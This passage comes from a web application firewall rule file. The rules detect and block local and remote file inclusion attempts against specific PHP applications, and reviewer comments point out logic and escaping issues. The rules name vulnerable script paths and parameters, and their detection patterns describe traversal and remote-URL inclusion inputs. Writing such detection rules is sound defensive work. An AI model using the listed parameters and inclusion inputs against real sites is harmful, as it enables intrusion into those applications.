    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Reviewer notes for the rules below ---
# Each chain starts with a case-sensitive substring match on REQUEST_LINE
# (after urlDecodeUni, htmlEntityDecode and normalisePathWin) for the script
# path. The middle link requires either "GET " or "system[" somewhere on the
# request line. The last link tests the argument for "../", counts TX entries
# whose name matches /RFI.*ARGS:<param>/ (the leading & yields a count), or
# runs a regex on the query string / body. On a match it adds audit-log
# part E, sets tx.msg, adds tx.critical_anomaly_score to tx.anomaly_score and
# stores the matched value under
# tx.<rule.id>-WEB_ATTACK/RFI-<matched_var_name>.
# NOTE(review): chains with the "GET " link do not score the same parameter
# when it arrives with another method.

# (2009168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion
SecRule REQUEST_LINE "@contains /message_class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009168,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33718'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:pfadhier "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008687) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion
# NOTE(review): the message says Local File Inclusion, but the last link
# counts WEB_ATTACK/RFI TX entries for "site_id" instead of testing for "../"
# as the neighbouring LFI rules do - confirm which check is intended.
SecRule REQUEST_LINE "@contains /passwiki.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008687,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29455'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:site_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# Persism CMS rules: the "system[" link only requires that text somewhere on
# the request line, and the last link matches any "=<scheme>:/" (http, https,
# ftp, ftps, php) in the query string or body - it is not tied to the
# system[...] parameter itself, so another parameter carrying a URL on the
# same request also satisfies it.

# (2003660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt - Headerfile.php System
SecRule REQUEST_LINE "@contains /blocks/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003660,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt - Headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'"
    SecRule REQUEST_LINE "@contains system[" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt - Headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_files.php System
SecRule REQUEST_LINE "@contains /files/blocks/latest_files.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003661,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_files.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'"
    SecRule REQUEST_LINE "@contains system[" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_files.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_posts.php System
SecRule REQUEST_LINE "@contains /forums/blocks/latest_posts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003662,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_posts.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'"
    SecRule REQUEST_LINE "@contains system[" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_posts.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003663) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- groups_headerfile.php System
SecRule REQUEST_LINE "@contains /groups/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003663,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- groups_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'"
    SecRule REQUEST_LINE "@contains system[" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- groups_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003664) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- filters_headerfile.php System
SecRule REQUEST_LINE "@contains /filters/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003664,rev:6,msg:'SLR: ET 
WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- filters_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- filters_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003665) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- links.php System SecRule REQUEST_LINE "@contains /links/blocks/links.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003665,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- links.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- links.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- menu_headerfile.php System SecRule REQUEST_LINE "@contains /menu/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003666,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- menu_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- menu_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003667) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_news.php System SecRule REQUEST_LINE "@contains /news/blocks/latest_news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003667,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_news.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_news.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- settings_headerfile.php System SecRule REQUEST_LINE "@contains /settings/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003668,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- settings_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- settings_headerfile.php 
System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003681) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- users_headerfile.php System SecRule REQUEST_LINE "@contains /modules/users/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003681,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- users_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- users_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhpBlock basicfogfactory.class.php PATH_TO_CODE Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /basicfogfactory.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009415,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PhpBlock basicfogfactory.class.php PATH_TO_CODE Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28588'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:PATH_TO_CODE/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhpBlock basicfogfactory.class.php PATH_TO_CODE Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008871) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpFan init.php Remote File 
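Inclusion
SecRule REQUEST_LINE "@contains /includes/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008871,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpFan init.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32335'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:includepath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpFan init.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[...]" is a character class and the selector cannot match the bracketed
# parameter name; the bracketed &TX selector in this block is escaped accordingly.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2008899) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pie RSS module lib parameter remote file inclusion
SecRule REQUEST_LINE "@contains /lib/action/rss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008899,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Pie RSS module lib parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,32465'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:lib/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pie RSS module lib parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003691) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion Attempt -- psg.smarty.lib.php cfg sys base_path
SecRule REQUEST_LINE "@contains /psg.smarty.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003691,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion Attempt -- psg.smarty.lib.php cfg sys base_path',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1390'"
SecRule &TX:'/RFI.*ARGS:cfg\x5bsys\x5d\x5bbase_path\x5d/' "@gt 0" 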
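"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion Attempt -- psg.smarty.lib.php cfg sys base_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d (the same form
# the Plume CMS regex below already uses). Left unescaped, "[...]" is a
# character class and the selector cannot match the bracketed parameter name.

# (2003702) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion class.Smarty.php cfg sys base_path
SecRule REQUEST_LINE "@contains /resources/includes/class.Smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003702,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion class.Smarty.php cfg sys base_path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3733'"
SecRule &TX:'/RFI.*ARGS:cfg\x5bsys\x5d\x5bbase_path\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pixaria Gallery Remote Inclusion class.Smarty.php cfg sys base_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2002815) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Plume CMS prepend.php Remote File Inclusion attempt
SecRule REQUEST_LINE "@contains /prepend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002815,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Plume CMS prepend.php Remote File Inclusion attempt',tag:'web-application-attack',tag:'bugtraq,16662'"
SecRule QUERY_STRING|REQUEST_BODY "@contains _px_config[manager_path]=" "chain"
SecRule QUERY_STRING|REQUEST_BODY "(?i:_px_config\x5bmanager_path\x5d=(https?|ftps?|php)\:)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Plume CMS prepend.php Remote File Inclusion attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010466) SpiderLabs Research (SLR) Public 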
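Vulns: ET WEB_SPECIFIC_APPS PointComma pctemplate.php pcConfig Parameter Remote File Inclusion Attempt
# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[smartyPath]" is a character class and the selector cannot match the
# parameter name pcConfig[smartyPath].
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.
SecRule REQUEST_LINE "@contains /includes/classes/pctemplate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010466,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PointComma pctemplate.php pcConfig Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.nl/0911-exploits/pointcomma-rfi.txt'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:pcConfig\x5bsmartyPath\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PointComma pctemplate.php pcConfig Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Portail Includes.php remote file include
SecRule REQUEST_LINE "@contains /includes/includes.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003371,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Portail Includes.php remote file include',tag:'web-application-attack',tag:'bugtraq,22361'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:site_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Portail Includes.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /footer.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009659,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard 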
footer.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[footer] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /header.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009660,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[header] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Pragyan CMS form.lib.php sourceFolder Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /cms/modules/form.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009898,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Pragyan CMS form.lib.php sourceFolder Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,30235'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sourceFolder/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Pragyan CMS form.lib.php sourceFolder Parameter Remote File 
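Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010276) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ProdLer prodler.class.php sPath Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /include/prodler.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010276,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ProdLer prodler.class.php sPath Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule &TX:'/RFI.*ARGS:sPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ProdLer prodler.class.php sPath Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[language]" is a character class and the selector cannot match the
# parameter name pun_user[language].
# NOTE(review): the rule below is titled Local File Inclusion but counts TX
# entries whose name contains "RFI"; whether a traversal-style value ever
# creates such an entry depends on rules outside this block - verify.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2008880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains functions_navlinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:pun_user\x5blanguage\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains profile_send.php" 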
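"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:pun_user\x5blanguage\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# NOTE: the text between /.../ in a TX selector is a regular expression, so a
# literal bracket in a parameter name is written \x5b or \x5d. Left unescaped,
# "[language]" is a character class and the selector cannot match the
# parameter name pun_user[language]; both &TX selectors in this block are
# escaped accordingly.
# NOTE(review): chains that test REQUEST_LINE for "GET " do not cover the same
# parameter sent with another request method - confirm that is intended.

# (2008882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains viewtopic_PM-link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/RFI.*ARGS:pun_user\x5blanguage\x5d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009502) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /server_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009502,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Remote File 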
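Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'"
SecRule REQUEST_LINE "@contains GET " "chain"
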